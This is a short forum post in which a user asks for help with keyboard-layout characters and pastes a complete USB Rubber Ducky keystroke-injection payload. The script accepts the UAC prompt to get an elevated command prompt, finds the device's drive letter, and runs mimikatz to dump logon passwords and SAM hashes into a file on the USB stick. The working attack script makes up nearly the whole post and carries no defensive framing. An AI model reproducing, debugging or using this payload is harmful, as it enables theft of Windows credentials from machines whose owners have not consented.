Jump to content

warmotion

Active Members
  • Posts

    6
  • Joined

  • Last visited

Posts posted by warmotion

  1. hello I'm from Mexico and I have a problem with 2 characters with latin american keyboard, someone could help me fix it?.... characters are: ^ |


    REM *** UAC Bypass ***

    DELAY 2000

    WINDOWS r

    DELAY 200

    STRING powershell Start-Process cmd -Verb runAs

    ENTER

    DELAY 2000

    LEFTARROW

    DELAY 500

    ENTER

    DELAY 500


    REM *** Define DUCKY drive as %duck%

    STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d

    ENTER

    DELAY 500


    REM *** Execute mimikatz from SD card and save log file to disk ***

    STRING %duck%\mimikatz.exe "privilege::debug" "sekurlsa::logonPasswords full" "samdump::hashes" exit > %duck%\%computername%-passwords.txt

    ENTER


    REM *** GTFO ***

    STRING exit

    ENTER

    STRING exit

    ENTER

×
×
  • Create New...